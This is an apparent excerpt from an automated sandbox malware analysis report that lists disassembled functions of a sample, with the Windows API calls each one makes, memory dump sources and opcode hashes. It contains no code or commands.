Uniqueness Score: -1.00%

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON

Download Yara Rule

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Uniqueness

Uniqueness Score: -1.00%

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 360B571A Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 360B57A6
GetCurrentThread.KERNEL32 ref: 360B57E3
GetCurrentProcess.KERNEL32 ref: 360B5820
GetCurrentThreadId.KERNEL32 ref: 360B5879

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 92ec828d7cd80671d015633fe9e515a70ce9ddd35cef752bfe47fedf3d73bff7
Instruction ID: 146ab2cd8828629ae5262df1c07e5e030c5adecd911b0335cf200328237631b1
Opcode Fuzzy Hash: 92ec828d7cd80671d015633fe9e515a70ce9ddd35cef752bfe47fedf3d73bff7
Instruction Fuzzy Hash: EE5147B49003498FDB05CFA9D945B9EBFF1AF89310F20C499E059B7260D7749981CF65

Uniqueness

Uniqueness Score: -1.00%

Function 360B5728 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 360B57A6
GetCurrentThread.KERNEL32 ref: 360B57E3
GetCurrentProcess.KERNEL32 ref: 360B5820
GetCurrentThreadId.KERNEL32 ref: 360B5879

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 25a5771bd84230a9439fd6b37a7f549ffdd12570fcb191e1652fafd79dddf1df
Instruction ID: 55361f2b999df2458ab89206327b06f76b2679ec1408928873aba1469533828e
Opcode Fuzzy Hash: 25a5771bd84230a9439fd6b37a7f549ffdd12570fcb191e1652fafd79dddf1df
Instruction Fuzzy Hash: CC5148B49003498FDB05CFAAD949B9EFBF1AF89310F20C499E419B7260D7749941CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Uniqueness

Uniqueness Score: -1.00%

Function 3556E310 Relevance: 3.9, Strings: 3, Instructions: 186COMMON

Download Yara Rule

Strings

XPcq, xrefs: 3556E461
fcq, xrefs: 3556E33B
\Ocq, xrefs: 3556E4EB

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 5b03d5b727ec2636a53c3f25bcd6def830c4d8715c6c63a0baa2e4097e852a2a
Instruction ID: e0982a0889b959122f9343beca41bdbf24e1aae6b3c3063d4701a72a5136613c
Opcode Fuzzy Hash: 5b03d5b727ec2636a53c3f25bcd6def830c4d8715c6c63a0baa2e4097e852a2a
Instruction Fuzzy Hash: BF619174B002089FEB159FB5C85479EBBF6FB88704F24846AE109EB395DF705C458B51

Uniqueness

Uniqueness Score: -1.00%

Function 35C0A581 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

TT5, xrefs: 35C0A5EF

Memory Dump Source

Source File: 00000005.00000002.1880816110.0000000035C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35c00000_srcngmlC.jbxd

Similarity

API ID:
String ID: TT5
API String ID: 0-2360005808
Opcode ID: 9d567743bd61b1e983f2f69367c1d1921e4006d8755b5b9455bc106a18ac50e7
Instruction ID: 1619f223bf2daca50b685c993b13d772b0eb88dc36bb1c9f933e75404dd101f1
Opcode Fuzzy Hash: 9d567743bd61b1e983f2f69367c1d1921e4006d8755b5b9455bc106a18ac50e7
Instruction Fuzzy Hash: 02412372E183558FCB00CFB9D8142AEBBF5AF89310F1489ABD404E7290DB34E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 35565A82 Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

@?T5, xrefs: 35565B21
XtT5, xrefs: 35565B8C

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: @?T5$XtT5
API String ID: 0-104808372
Opcode ID: 72e1f64439fa238dae3123b4bfd6a180fcdea548535c05e3983bf818faeeaba3
Instruction ID: 9342e6d3ebb139d71dd00959adbaa5ce1157652b090e8f8b42a2855b01795cf2
Opcode Fuzzy Hash: 72e1f64439fa238dae3123b4bfd6a180fcdea548535c05e3983bf818faeeaba3
Instruction Fuzzy Hash: CE913B78A101449FDB04DF68D594AADBBF6BF88355F648465E806E73A5DF30AC42CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3556E302 Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

XPcq, xrefs: 3556E461
fcq, xrefs: 3556E33B

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 9a7e8b91c5cf1712d60a68be5015a9c7792630f793e720c038f724139603fab9
Instruction ID: a063984d0597eea82542a117aef5a89b96994e1d6ac31b21ab0a76da36e21c2a
Opcode Fuzzy Hash: 9a7e8b91c5cf1712d60a68be5015a9c7792630f793e720c038f724139603fab9
Instruction Fuzzy Hash: 0E518F75B012089FEB059FB5C954B9EBBF6BF88700F20856AE105AB395DB709C018B91

Uniqueness

Uniqueness Score: -1.00%

Function 3556E338 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

XPcq, xrefs: 3556E461
fcq, xrefs: 3556E33B

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: fca21b2f12bfd4a2afc23765fad6146c283eabbdefca20219bb4ae9e4e0ac81f
Instruction ID: cb537de18a616cf7ec4d24c03927f8c26ffb6347ba71463f9df6f881deea3887
Opcode Fuzzy Hash: fca21b2f12bfd4a2afc23765fad6146c283eabbdefca20219bb4ae9e4e0ac81f
Instruction Fuzzy Hash: 4D416E74B002089FEB059FB5C99479EBBF2FFC8700F24856AE105AB395DB749C028B95

Uniqueness

Uniqueness Score: -1.00%

Function 360B1C0A Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 360B1D22

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e6d2b97e70da1734183c11df3ea5fc50c566066c8a4ed1312c0ff777cec5640e
Instruction ID: d04fb81536625d42d84a158ab176fbb7d09d3fbf7be1593c473b918fb52d005c
Opcode Fuzzy Hash: e6d2b97e70da1734183c11df3ea5fc50c566066c8a4ed1312c0ff777cec5640e
Instruction Fuzzy Hash: 8A51CDB5D003499FDB14CFA9D880ADEBFF5BF88300F24856AE819AB210D7759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 360B1C10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 360B1D22

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 49c7fc3c3e0f6689f56712444b6ece7cce6de2dcde35610ddaaa2b6995fa012e
Instruction ID: 4e48d0fc1603fd11450c70999a16241d634e6206ef3040103e3054a8385d1dd1
Opcode Fuzzy Hash: 49c7fc3c3e0f6689f56712444b6ece7cce6de2dcde35610ddaaa2b6995fa012e
Instruction Fuzzy Hash: 3741BDB5D003099FDF14CFAAD880ADEBFB5BF48350F20856AE819AB210D7759881CF91

Uniqueness

Uniqueness Score: -1.00%

Function 360B5504 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 360B68C9

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c3654521a5b8c357896e6fdbfa52aba322493e58f746afb6c507c1c3b0aaa091
Instruction ID: e601d681b4afba00ca3a4ad1961091dfef7f999891c43a2356aa3c5a7875d937
Opcode Fuzzy Hash: c3654521a5b8c357896e6fdbfa52aba322493e58f746afb6c507c1c3b0aaa091
Instruction Fuzzy Hash: 044125B89103458FDB00CF9AC485A9EBBF5FB89314F24C599E519AB320D770E841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 360B7545 Relevance: 1.6, APIs: 1, Instructions: 75comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 360B75D8

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 3db535aaa89381d59a38b5a4fa60c0d8a08e04a532e376da7615a5d2aba07cc4
Instruction ID: 1e66d4b5b62cba873b440037c1f7700c11346f50f5263585472e6967d5570b67
Opcode Fuzzy Hash: 3db535aaa89381d59a38b5a4fa60c0d8a08e04a532e376da7615a5d2aba07cc4
Instruction Fuzzy Hash: 913101B4D01248DFDB10CF99C985BCEBFF5AB48314F248059E408AB3A4DB74A985CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B7550 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 360B75D8

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: ead9710df92b5113c5124234150c1c3b6dec9f3ae72a7c1689b76c8026f095cf
Instruction ID: a92d956033ad2bf5e37b3aa55e455104f42b29f62400bfed190cdd755c9bf9fa
Opcode Fuzzy Hash: ead9710df92b5113c5124234150c1c3b6dec9f3ae72a7c1689b76c8026f095cf
Instruction Fuzzy Hash: F731E0B0D01208DFDB10CF99C985BCEBFF5AB48304F248059E408AB3A4DB74A985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 360B5968 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360B59F7

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b79171a7e36ab9700977669eef552c2f03a35d92c08db7d3a92b9d3e8a0f2dd4
Instruction ID: e6912987617074e6557d745531df476dfde339b28297f4939eb2f0837b281847
Opcode Fuzzy Hash: b79171a7e36ab9700977669eef552c2f03a35d92c08db7d3a92b9d3e8a0f2dd4
Instruction Fuzzy Hash: 3521E5B5900248DFDB10CFAAD984ADEFFF8EB48310F14845AE954A3360D375A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 361B06B8 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 361B072A

Memory Dump Source

Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 55a19bd3c2b87b50a69ce902e4dd59afd77901dce432c46a332d4f931d49d57a
Instruction ID: 46b364388c657491f7b2f7a61a0d64d034a1152b23b317e7aa8b40d7a25573d8
Opcode Fuzzy Hash: 55a19bd3c2b87b50a69ce902e4dd59afd77901dce432c46a332d4f931d49d57a
Instruction Fuzzy Hash: CA2167BAD043498FCB10CFAAD444ADEFBF4EB88360F10842EE559A7210C375A585CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 360B5970 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 360B59F7

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d815ad32958cb52fd76f0af4a95acc280657f2eb6a5d642fa3f8d5285f93a716
Instruction ID: 7f8fea2a304e62d994d8b27b63e6ddc6d7858bdfda0c0263a2d6e60b5f1acb64
Opcode Fuzzy Hash: d815ad32958cb52fd76f0af4a95acc280657f2eb6a5d642fa3f8d5285f93a716
Instruction Fuzzy Hash: D021C4B5900258DFDB10CF9AD985ADEBFF8EB48320F14845AE954A7350D374A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B8F39 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 360B8FBB

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 7f17bfbfd64e9a99541d59238582d59cfec7cdcae5f855c46340959bf992b941
Instruction ID: 146c44595e83a06853a51f50d29b8e6fa3bc588847fad8e74ecb682f18a556e1
Opcode Fuzzy Hash: 7f17bfbfd64e9a99541d59238582d59cfec7cdcae5f855c46340959bf992b941
Instruction Fuzzy Hash: 462129B5D002099FCB10DF9AD845BDEFBF5EB88320F108429E459A7250C775A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B5540 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 167a1dceea0f21f38a3d43a7862072de4cb171ea74c152f8b02631c3a709acf1
Instruction ID: 20cd8f1dbfb29d30b42bffabc9964f7eb3d8f544d408720bc3a14fb07e3ed221
Opcode Fuzzy Hash: 167a1dceea0f21f38a3d43a7862072de4cb171ea74c152f8b02631c3a709acf1
Instruction Fuzzy Hash: 731167B18043988FCF11DFA9D441BDEBFF4AF49324F10809AD598A7251C674A884CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 360B8F40 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 360B8FBB

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 73f117eddacc32fc4dfa63e0452067d594dfeedc50cb8f836516bca3600be7ab
Instruction ID: a79b6114d1d68a3f4673ac58635a6735478532c660ed4ed97ac4b002023fde41
Opcode Fuzzy Hash: 73f117eddacc32fc4dfa63e0452067d594dfeedc50cb8f836516bca3600be7ab
Instruction Fuzzy Hash: 2F2108B5D00209DFCB14DF9AC945BDEFBF5EB88310F10842AE459A7260C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 31B49460 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 31B494D4

Memory Dump Source

Source File: 00000005.00000002.1877095074.0000000031B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_31b40000_srcngmlC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 436f5752cfa673ef7ee9de8b444afd5d71d80cd33648f5506794690449a648e4
Instruction ID: 73ae27743537dc61aaf631f8093897dd0613ae381a1c43a8501496ac5d14f287
Opcode Fuzzy Hash: 436f5752cfa673ef7ee9de8b444afd5d71d80cd33648f5506794690449a648e4
Instruction Fuzzy Hash: 131106B5D002499FDB20DFAAC480ADEFBF4FF48320F10842AE459A7250CB75A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 35C0A668 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 35C0A6CF

Memory Dump Source

Source File: 00000005.00000002.1880816110.0000000035C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 35C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35c00000_srcngmlC.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 639ec3d60ffa0b4805f0f00b2168b5485b8589650cc8d1f228a8a06644d10dd7
Instruction ID: b1f34b3f9af7dc5e1652d400834b84458a69df7b8d11367312bb22013cfdb13c
Opcode Fuzzy Hash: 639ec3d60ffa0b4805f0f00b2168b5485b8589650cc8d1f228a8a06644d10dd7
Instruction Fuzzy Hash: 7611F0B1C006699FCB10DF9AC945BDEFBF4AF48324F10856AE818A7250D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 361B06C0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,?,?), ref: 361B072A

Memory Dump Source

Source File: 00000005.00000002.1881434210.00000000361B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 361B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_361b0000_srcngmlC.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4574aa64a336138de4383239e919d63dd132513325a113a1681d8435c1064a62
Instruction ID: 7cb42cc1b852d6901ac4bb951cab83576c127328c3c428266ddf271e43bf5f03
Opcode Fuzzy Hash: 4574aa64a336138de4383239e919d63dd132513325a113a1681d8435c1064a62
Instruction Fuzzy Hash: DC1104BAD002098FDB10CF9AD444ADEFBF8EB48350F10842EE559A7210C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 31B49638 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 31B4969A

Memory Dump Source

Source File: 00000005.00000002.1877095074.0000000031B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_31b40000_srcngmlC.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ba6ed3b63733c00533efa6482d271a8cd25f28e89f27abf0898e785759136f29
Instruction ID: b6cb09ca4bfd0b05d3e542c96dcca9bc2c2085be357132f9ae1d9aeab30d24e9
Opcode Fuzzy Hash: ba6ed3b63733c00533efa6482d271a8cd25f28e89f27abf0898e785759136f29
Instruction Fuzzy Hash: 771136B19002588FDB20DFAAC4457DEFFF4EB88324F20842AD459A7250CB79A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B14DA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 360B1546

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6ca37c263543c96ad20728603687aa67571d495d0ebb7ea05fb922e7708ab982
Instruction ID: 434e70c384c80bb6a27569c79605f12ee1c4e2826b3690c7eb6670a00dd9de23
Opcode Fuzzy Hash: 6ca37c263543c96ad20728603687aa67571d495d0ebb7ea05fb922e7708ab982
Instruction Fuzzy Hash: A3111FB9C002498FCB10CF9AC441ACEBFF4AB48310F1084AAD85AA7210C379A541CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B14E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 360B1546

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a3d03cc9755cf2839ba670739ca78f75155edd009860517e52aebf63762c2257
Instruction ID: c2376d1b5e490c6a02b943b80bc91db945b5dff93bba986bf7094beca3ccd69a
Opcode Fuzzy Hash: a3d03cc9755cf2839ba670739ca78f75155edd009860517e52aebf63762c2257
Instruction Fuzzy Hash: 7311D2B5C00249CFCB10DF9AD445ADEFFF4AB49310F10C45AD55AA7610C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B6B38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F

Memory Dump Source

Source File: 00000005.00000002.1881234803.00000000360B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 360B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360b0000_srcngmlC.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 24981e2c0bb9411e88396d1feb99283653293d8b2a8e782b9ca40714f87ae51f
Instruction ID: 8d8c8f3a5e0e27542cb340898be2aeddcc7892490b0cdb00e9ec0544ac5f9b4b
Opcode Fuzzy Hash: 24981e2c0bb9411e88396d1feb99283653293d8b2a8e782b9ca40714f87ae51f
Instruction Fuzzy Hash: 561106B5800248CFCB20DF9AD845BDEFFF4EB49324F20845AE558A7650C775A580CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 360B555C Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,360B6B15), ref: 360B6B9F

Memory Dump Source

